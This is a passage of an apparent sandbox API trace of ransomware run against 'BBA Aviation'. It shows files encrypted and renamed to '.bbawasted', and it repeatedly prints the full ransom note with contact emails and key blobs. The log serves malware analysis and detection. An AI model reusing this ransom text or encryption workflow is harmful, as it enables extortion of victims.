KEY:\r\n[begin_key]p2Kpys/796il1+Vxf64Y2+QvsO9ff/aPPSIQrGtOImH+tNC/lxdg815WEjUuvGaa\r\nw6qigQW/DUghNDIvzKLj/X/+FMOpbpAczTWpS5sheom45EsNgdwts69/6zu0CiSc\r\nQ/6pjLW7/N52OYKV4DJWfHuWNAzaiGsp9HDUw5GDAkU5HA7Ag7onXltiHacY/ZV0\r\nUTadjpctSZOXgJRKy0H0qgHukXvY4i+e77Y8kcVjrX7g61xqtx4qXb/stwBdh8Bo\r\nci4fPgEQkWmviXFBNx14D097F9ELobGB9asRQDtlqRN/9bJMeM8tq1xRn99aE23m\r\ngGobu4c5SzCvBdBBkMjx3PMqd2EvTQyXgs1EN/myiDOJ2gXYKXw07no92jToEoOZ\r\nY9sna+4A9wypC6DIeyjW6gaHDxyTnUoCb9bWp/ZEXteI4A/A/0UWbBEcjsTcbq4o\r\nHi2ufZsX3ip9mpmYnlVZS7aTnjnMOpbZTqRLWZDm6T8zMW/6ZaNqOihUtPsSkrGu\r\nQaHrB/kYIiQnZTQM7OrrkCyc5SSCEFWmR+NraWLgadY27aYG80tvZSSKff/HknzH\r\nM4yt7PetF/mMW5Nsoi3YLXkiUaTCSuNIhztL6eHIYyvLq9dXUhU+rqTC4zieeKGO\r\nbn4J68EpVO7L3qBliYtbAxgdSklly96s3hsuO7NJ8A5=[end_key]\r\nKEEP IT\r\n") returned 984 [0231.345] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0231.345] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0231.560] SetEndOfFile (hFile=0x27c) returned 1 [0231.917] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0231.918] CloseHandle (hObject=0x27c) returned 1 [0231.918] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0231.918] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a75b8 | out: hHeap=0x660000) returned 1 [0231.918] _aulldvrm () returned 0x0 [0231.918] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6020) returned 1 [0231.919] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0231.919] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0231.919] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 51 [0231.919] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x270) returned 0x6a1538 [0231.919] lstrcpyW (in: lpString1=0x6a159e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0231.919] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0231.919] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6790) returned 1 [0231.920] CryptGenRandom (in: hProv=0x6a6790, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0231.920] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0231.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.bbawasted_info" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0231.923] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0231.924] SetEndOfFile (hFile=0x27c) returned 1 [0231.924] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.924] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0231.924] lstrcpyW (in: lpString1=0x6a159e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0231.924] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.bbawasted" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.bbawasted")) returned 1 [0231.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.bbawasted" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0231.926] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0231.927] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x3c0 [0231.927] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3c0) returned 0x5f0000 [0231.927] CloseHandle (hObject=0x290) returned 1 [0231.949] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0231.949] CloseHandle (hObject=0x294) returned 1 [0231.950] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0231.950] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6570) returned 1 [0231.950] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0231.950] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0231.950] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6680) returned 1 [0231.951] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0231.951] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0231.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6ad900 [0231.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0231.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0231.962] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]r1USG+Y1gUd33WDKDKmXSxUvL/C5f1GS2kRTU4keD0ZmVoUroeeZ+JbtwOWcbi+A\r\nt2L/Q2XIcpQw+aXnjVylQ0ZoqypBMpI4nB9t6NQ/8PfmOU4rr9LkdbZubL988CrW\r\n/CMHdo14FGEVY86LU1NpcPyTS83FaBG3FyQxwc+xrs7NsH1ZLCbOhfqcemLkWQXi\r\nML+Nd6Tyq4C4wi3KKNyFNBTt2v4DQJAsT+R3G9PCj4XgMU404mth1VLCs7cIWVZC\r\n7VUzj98JbadffqPFXG8CnEDdci7p2V9x2nJMviXQYGpya8sOZyRqjNMPs/TXhSg3\r\nZPZNrgzNac2BBMJ0W6x8tx8XmuDNoS079QVwazhJTEI531B9RqIqrBmnT81Abyze\r\npjyQlGgpKWx/0N+U0YNtW3pyHEgv4G6/Y7VCle+E81rXqDq5GJO97zW5jf0c0ipf\r\ndGfjmw1EwBDGfgTxxjBQNkOBT9H/pDMGYm3pIlxQ3SNMRnoOvy6Wuc3/+rUbXxUQ\r\nSTdEbCbUD5KaX21Ub+VW/0KcKriw2BvzLJ22gcr5qHPqPtrZ3VPHMAoFXS3ZQ61r\r\n7vshwUMsuGQla98uaQTktwms69ECNFgxSBo+7NRqMgG4LOgsT9PqmJIutyLLaH/Y\r\nfLdG6hQKRBiQgr2DtmbI6mpaTPnptPryFofS8yTIIxb=[end_key]\r\nKEEP IT\r\n") returned 984 [0231.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0231.962] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0231.962] SetEndOfFile (hFile=0x27c) returned 1 [0231.971] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0231.971] CloseHandle (hObject=0x27c) returned 1 [0231.971] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1538 | out: hHeap=0x660000) returned 1 [0231.971] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b13f0 | out: hHeap=0x660000) returned 1 [0231.972] _aulldvrm () returned 0x0 [0231.972] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6bd0) returned 1 [0231.972] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0231.972] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0231.972] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\BiosBlocks.xml") returned 54 [0231.972] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x276) returned 0x6ad900 [0231.973] lstrcpyW (in: lpString1=0x6ad96c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0231.973] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0231.973] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6350) returned 1 [0231.974] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0231.974] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0231.974] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\BiosBlocks.xml.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\amd64\\biosblocks.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0232.347] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0232.348] SetEndOfFile (hFile=0x28c) returned 1 [0232.350] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0232.351] lstrcpyW (in: lpString1=0x6ad96c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0232.351] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\BiosBlocks.xml" (normalized: "c:\\windows10upgrade\\resources\\amd64\\biosblocks.xml"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\BiosBlocks.xml.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\amd64\\biosblocks.xml.bbawasted")) returned 1 [0232.465] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\amd64\\BiosBlocks.xml.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\amd64\\biosblocks.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0232.465] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0232.465] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x16ebc [0232.466] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16ebc) returned 0x610000 [0232.466] CloseHandle (hObject=0x290) returned 1 [0233.592] UnmapViewOfFile (lpBaseAddress=0x610000) returned 1 [0233.593] CloseHandle (hObject=0x280) returned 1 [0233.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6adb80 [0233.593] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6240) returned 1 [0233.594] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x6adbc8 | out: pbBuffer=0x6adbc8) returned 1 [0233.594] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0233.594] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a69b0) returned 1 [0233.595] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0233.595] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0233.603] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0233.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb80 | out: hHeap=0x660000) returned 1 [0233.603] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0233.603] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]jD/s636MyWhKZninBrPP5airj8d8Jl4uRuw6JHbU97Kb/0ioVysn0gePQ67SGu0t\r\nn39EdIGkY/KDGI/Q83/NA9n3XWseJxffWJ7USUW+G41K9/Ino66sNsX6sPpCQRvn\r\nt+B1tVe1eYjyEHu6JriQDacSw1zE+56vTveSuSlPhpdLFCVmFjDA0yKBKY+EMf0c\r\n4cPSGtATZhfSICUJHdP/KTAmvSlNt9iMIs83biRBGtSX7VV+rYg0Y+kSco7qTd5T\r\nqlWFUqob5vDsVr3DHDFoXDltpdX5DzYErkKWLed1xS5V8S1zA1ormCKUCbBV67YL\r\njJ5XUzxI+K0mP5BuotNha1d/J/Q3iW0Xdu9jqg043IsMIzoi5QeueEBfbl4/E2cm\r\noxGGYVeX8ZqP15Ceowqh5Qm0YpeN69Bl9qcdSY3ngHAd0NdUTXSsOJTOzuIZGjL0\r\nu/Yq0xI9yTNR3F4JXY5FjbGkyok1a1smYIXTmfiuTx+tFvak4zwaIKnUzylwDZh2\r\nHkuL9OozRV82L0znUg96GY0bfuTZyBKQPtoRz+iC19eOVTiMMJYvyePR0Eftjf42\r\n2KNAXvXdcebxrAObiXYXz+uBTTrtcf9P9e70p3iI0D17+MK6ymZ6aBADFSRJDAce\r\nddWPY28FgcX/A/VA16oZMv2B7TQSd/eg4Ce2SGVmiUd=[end_key]\r\nKEEP IT\r\n") returned 984 [0233.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0233.603] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0233.604] SetEndOfFile (hFile=0x28c) returned 1 [0233.606] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0233.606] CloseHandle (hObject=0x28c) returned 1 [0233.607] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0233.607] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b6ca8 | out: hHeap=0x660000) returned 1 [0233.607] _aulldvrm () returned 0x0 [0233.607] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6460) returned 1 [0233.607] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0233.607] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0233.607] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\hwcompatShared.txt") returned 52 [0233.607] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x272) returned 0x6c4b88 [0233.608] lstrcpyW (in: lpString1=0x6c4bf0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0233.608] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0233.608] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6570) returned 1 [0233.608] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0233.608] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0233.608] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\hwcompatShared.txt.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\hwcompatshared.txt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0233.620] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0233.621] SetEndOfFile (hFile=0x28c) returned 1 [0233.621] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0233.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0233.621] lstrcpyW (in: lpString1=0x6c4bf0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0233.621] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\hwcompatShared.txt" (normalized: "c:\\windows10upgrade\\resources\\hwcompatshared.txt"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\hwcompatShared.txt.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\hwcompatshared.txt.bbawasted")) returned 1 [0233.622] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\hwcompatShared.txt.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\hwcompatshared.txt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0233.622] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0233.622] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xc981b [0233.622] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc981b) returned 0x1480000 [0233.623] CloseHandle (hObject=0x280) returned 1 [0234.024] UnmapViewOfFile (lpBaseAddress=0x1480000) returned 1 [0234.032] CloseHandle (hObject=0x294) returned 1 [0234.032] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0234.032] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6570) returned 1 [0234.033] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0234.033] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0234.033] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a65f8) returned 1 [0234.033] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0234.033] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0234.041] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6ad900 [0234.042] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0234.042] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0234.042] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]QT3MoQp0WcNwRlqc3DuEM655jhljn/QjQYhh41CmvlzF7LFSJAkJq0WuGkfYdujH\r\n4HeR90+v53JSfPOgAyJbQF0H9+kJEguH8HkuqIqU26Gme+LizxFjpxzy2flR46jy\r\nBdz7x0i/tustf3MHGTAHhDHkc8yALD6GkT1rD6JTEwS6vff+Z+YIQqjhb7n1qnlV\r\n6dC+/ONSOINlVSb97AS4pMXoMBZgdFJA8BiJlQo/ew1BavpNa0lNTZt99YDH6oS6\r\nqkibsX/xNi1ToBG5j/XalRDVSpIuHm62sDCYUMaWKUEgQZ8ydvikiAMRIWCw0wDv\r\ngxsgiMtf1DP0856WP1czxqNOOz39Gf+g0nzZl9/z43u7oQOu+42t+vQHis4WhgyO\r\n+mgFy1MWVoCZeSIIAr0qA6e/XmKQ1mDlzUw6lmmhhT0usFwZ2Aqjn4Lu7OjSBE/L\r\nBOOy7RxB9h9Nh/S7KQTORDnfvwTnBa4TZGfHRhRyrOs+S4wOT6Eopb8L8lY6We5S\r\n/b5PIsonI1ylSZ8XuD+LdUdgZgaWx4xwhBTDMi80x6zTpQWYZQ0jv1Et2pcpYX1d\r\nyOFVyjY/hzn64DmkObqzzxQLdatzR6+fLtvDblEzf+scPQf3B9G/0I4OliZ1er51\r\n/bkumtYOku3gsPLx5n4dWuCIVGNV9z/NVmzbhF1GyC5=[end_key]\r\nKEEP IT\r\n") returned 984 [0234.042] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0234.042] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0234.042] SetEndOfFile (hFile=0x28c) returned 1 [0234.044] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0234.044] CloseHandle (hObject=0x28c) returned 1 [0234.045] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0234.045] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b6e38 | out: hHeap=0x660000) returned 1 [0234.045] _aulldvrm () returned 0x0 [0234.045] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6708) returned 1 [0234.045] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0234.045] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0234.045] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\BiosBlocks.xml") returned 53 [0234.045] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x274) returned 0x6c4b88 [0234.046] lstrcpyW (in: lpString1=0x6c4bf2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0234.046] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0234.046] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6240) returned 1 [0234.046] 